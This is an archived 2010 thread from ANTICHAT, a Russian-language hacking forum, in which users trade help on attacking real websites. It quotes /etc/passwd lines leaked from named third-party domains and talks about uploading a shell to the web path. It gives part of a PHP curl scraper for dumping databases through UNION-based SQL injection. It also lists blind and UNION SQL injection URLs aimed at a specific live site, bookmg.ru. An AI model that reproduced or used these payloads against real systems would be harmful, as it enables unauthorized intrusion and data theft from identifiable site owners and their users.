ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.11.2010, 12:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от Gorev
Gorev said:
/etc/httpd/conf/httpd.conf
/usr/apache/httpd.conf
и так далее и тому подобное..тебе эти файлы о чем нибудь говорят ? в /etc/passwd очень редко путь абсолютный я находил..
мне говорят, но я же сначала глянул на этот сайт, а ты просто сумничать решил, тут, видимо, как раз тот редкий случай, когда в пассвд есть путь, а в хттпд.конф нет:
Код:
Code:
flash.dvd-photo-slideshow.com:x:502:48:flash.dvd-photo-slideshow.com:/var/www/flash.dvd-photo-slideshow.com:/sbin/nologin
jp.flash-slideshow-maker.com:x:503:48::/var/www/jp.flash-slideshow-maker.com:/sbin/nologin
m4p-mp3.tuneclone.com:x:504:48::/var/www/m4p-mp3.tuneclone.com:/sbin/nologin
skyalbum.com:x:505:48::/var/www/skyalbum.com:/sbin/nologin
|
|
|
|
17.11.2010, 12:58
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от freezed
freezed said:
мне говорят, но я же сначала глянул на этот сайт, а ты просто сумничать решил, тут, видимо, как раз тот редкий случай, когда в пассвд есть путь, а в хттпд.конф нет:
Код:
Code:
flash.dvd-photo-slideshow.com:x:502:48:flash.dvd-photo-slideshow.com:/var/www/flash.dvd-photo-slideshow.com:/sbin/nologin
jp.flash-slideshow-maker.com:x:503:48::/var/www/jp.flash-slideshow-maker.com:/sbin/nologin
m4p-mp3.tuneclone.com:x:504:48::/var/www/m4p-mp3.tuneclone.com:/sbin/nologin
skyalbum.com:x:505:48::/var/www/skyalbum.com:/sbin/nologin
придержи-ка свой язык..ты шелл залей по этому пути, потом вякай..
|
|
|
17.11.2010, 13:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от Gorev
Gorev said:
придержи-ка свой язык..ты шелл залей по этому пути, потом вякай..
а при чем тут шелл? вопрос был в том, чтобы найти абсолютный путь, я подсказал, он указан в /etc/passwd, а папку с правами на запись уж пусть сам дальше ищет
что ж ты нервный-то такой
|
|
|
|
17.11.2010, 13:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Сообщение от freezed
freezed said:
а при чем тут шелл? вопрос был в том, чтобы найти абсолютный путь, я подсказал, он указан в /etc/passwd, а папку с правами на запись уж пусть сам дальше ищет
что ж ты нервный-то такой
Не спорьте с Gorev. Он прав. И прекращайте флудить.
|
|
|
|
17.11.2010, 13:08
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Фараон
Фараон said:
Не спорьте с
Gorev
. Он прав.
Не всегда.
|
|
|
|
17.11.2010, 13:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от pinch
pinch said:
посоветуйте программу или скрипт для слива бд. Чтоб прога сливала через where+id
http://site.ru/news.php?id=1+union+select+1,2,name,4+from+users+w here+id={index}--
а не через limit.
можно такой примитив заюзать например
[PHP]
PHP:
[COLOR="#000000"] functionololo($url,$proxy='127.0.0.1')
{
$ch=curl_init($url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_PROXY,$proxy);
$content=curl_exec($ch);
curl_close($ch);
return$content;
}
$num='1000';// максимальный id
$regex='~(.*?)~';//ну ты понел
$f=fopen('db','a+');
for($i=0;$i[COLOR="#007700"]
|
|
|
|
18.11.2010, 14:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
283
Репутация:
0
|
|
http://www.bookmg.ru/news/post/id.15'
можно ли раскрутить?
|
|
|
|
18.11.2010, 15:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от lostelacoste
lostelacoste said:
http://www.bookmg.ru/news/post/id.15'
можно ли раскрутить?
как слепую точно можно:
true:
http://www.bookmg.ru/news/post/id.15+and+1=1
http://www.bookmg.ru/news/post/id.15+and+substring(@@version,1,1)='M'
http://www.bookmg.ru/news/post/id.15+and+(select+system_user)='sa'
false:
http://www.bookmg.ru/news/post/id.15+and+1=0
|
|
|
|
18.11.2010, 16:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
2498
Репутация:
2
|
|
Мог бы кто не будь рассказать или дать ссылки на русское описание по использованию(или видео) JBroFuzz?
Был бы весьма признателен.
P.S.Видео от создателей видел(OWASP),но может есть от наших умельцев.
|
|
|
|
18.11.2010, 18:43
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
Код:
Code:
http://www.bookmg.ru/news/post/id.-15 union all select @@version,null,null,null,null--
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
